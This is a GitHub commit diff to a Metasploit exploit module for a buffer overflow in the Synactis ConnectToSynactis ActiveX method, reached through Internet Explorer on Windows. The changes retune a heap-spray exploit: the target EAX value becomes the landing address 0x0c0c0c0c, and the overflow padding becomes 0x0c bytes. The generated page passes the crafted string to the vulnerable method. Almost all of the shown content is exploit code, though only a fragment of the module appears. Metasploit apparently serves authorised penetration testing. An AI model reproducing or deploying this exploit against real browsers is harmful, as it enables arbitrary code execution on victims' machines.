Skip to content

Commit f3421f2

Browse files
committed
Fix different landings
1 parent e559824 commit f3421f2

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
2222
:classid => "{C80CAF1F-C58E-11D5-A093-006097ED77E6}",
2323
:method => "ConnectToSynactis",
2424
:os_name => OperatingSystems::WINDOWS,
25-
:rank => Rank
25+
:rank => NormalRanking
2626
})
2727

2828
def initialize(info={})
@@ -60,7 +60,7 @@ class pointer saved on the stack, and results in arbitrary code execution under
6060
# Newer setups like Win + IE8: "Object doesn't support this property or method"
6161
[ 'Automatic', {} ],
6262
[
63-
'IE 7 on Windows XP SP3', {'Eax' => 0x20302028}
63+
'IE 7 on Windows XP SP3', {'Eax' => 0x0c0c0c0c}
6464
],
6565
[
6666
# 0x20302020 = Where the heap spray will land
@@ -171,8 +171,8 @@ def get_html(cli, req, target)
171171
var p2 = '';
172172
eax = "#{eax}";
173173
174-
while (p1.length < 189) p1 += "\\x41";
175-
while (p2.length < 7000) p2 += "\\x42";
174+
while (p1.length < 189) p1 += "\\x0c";
175+
while (p2.length < 7000) p2 += "\\x0c";
176176
177177
var obj = document.getElementById("obj");
178178
obj.ConnectToSynactis(p1+eax+p2);

0 commit comments

Comments
 (0)